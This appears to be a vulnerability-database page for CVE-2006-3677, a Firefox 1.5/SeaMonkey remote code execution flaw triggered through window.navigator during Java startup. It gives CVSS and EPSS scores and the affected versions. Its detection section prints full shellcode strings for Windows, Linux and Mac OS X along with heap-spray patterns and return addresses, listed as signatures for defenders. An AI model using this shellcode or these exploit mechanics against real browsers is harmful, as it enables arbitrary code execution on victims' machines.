cbcvebase.
CVE-2006-3677
published 2006-07-27

CVE-2006-3677: Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window…

PriorityP273high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
78.36%
99.5th percentile
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.

Affected

10 ranges
VendorProductVersion rangeFixed in
debianfirefox< firefox 1.5.dfsg+1.5.0.5-1 (sid)firefox 1.5.dfsg+1.5.0.5-1 (sid)
debianthunderbird< firefox 1.5.dfsg+1.5.0.5-1 (sid)firefox 1.5.dfsg+1.5.0.5-1 (sid)
mozillafirefox
mozillafirefox
mozillafirefox
mozillafirefox
mozillafirefox
mozillaseamonkey
mozillaseamonkey
mozillaseamonkey

Detection & IOCsextracted from sources · hover to see the quote

commandwindow.navigator.javaEnabled()
bytes
win32 shellcode: %ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065
bytes
linux shellcode: %u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080
bytes
mac osx x86 shellcode: %u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd
  • Exploit triggers by manipulating window.navigator object properties before Java plugin initialisation; detect JavaScript accessing and overwriting window.navigator properties combined with javaEnabled() calls in browser traffic.
  • Exploit delivery is an HTML page served as text/html containing a JavaScript heap-spray loop; look for large unescape() strings with repeated fill patterns (%u0800, %ua8a8, %u0c0c, %u1c1c) in HTTP responses targeting Firefox user-agents.
  • Vulnerability check in Metasploit module tests window.navigator.javaEnabled(); network-level detection can flag HTML pages that both call javaEnabled() and perform heap spray with unescape() fill patterns.
  • Win32 heap-spray return address 0x08000800 and fill pattern %u0800 are static across all known exploit variants; signature on these values in JavaScript can identify the Windows-targeted payload.
  • Linux heap-spray uses fill pattern %ua8a8 and integer-wrapped return address 0xa8000000 (-0x58000000); signature on %ua8a8 repeated heap spray identifies the Linux-targeted payload.
  • ·Exploit requires the Java plugin to be installed and enabled in the browser; without Java the vulnerability cannot be triggered.
  • ·Affected versions are Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 only; later versions are not vulnerable.
  • ·The Linux shellcode payload (touch /tmp/METASPLOIT) is noted as unreliable in the original PoC.
  • ·Metasploit module payload space is limited to 512 bytes with no bad characters, constraining usable shellcode.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
vendor_ubuntu7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.